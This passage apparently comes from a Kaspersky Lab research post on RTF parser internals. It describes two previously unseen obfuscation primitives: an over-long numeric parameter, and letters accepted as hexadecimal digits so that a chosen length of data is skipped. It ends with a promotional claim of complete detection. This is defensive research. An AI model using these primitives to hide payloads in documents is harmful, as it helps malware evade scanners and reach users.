First of all, the maximum allowed length of the numeric parameter is increased to 0xFF: it is calculated without considering the length of the control word.

The second catch is that the numeric parameter is not numeric anymore! The parser lets not only decimal characters but also Latin letters through. The parameter is then passed to a custom strtol, which makes it possible to specify, as a hexadecimal number, the length of data that should be skipped regardless of opening and closing braces.

Obfuscations with the use of these two primitives have not yet been encountered in the wild.

Reverse engineering has proved to be the most effective way to build a parser, and in the case of RTF it would most likely be impossible to achieve the desired behavior otherwise.

Exact parsing depends on small implementation details and algorithmic bugs rather than on a specification that could be confusing or state things that are not true.

Kaspersky Lab products detect all kinds of RTF obfuscation and perform the most correct processing of RTF files, providing the best protection to our end users.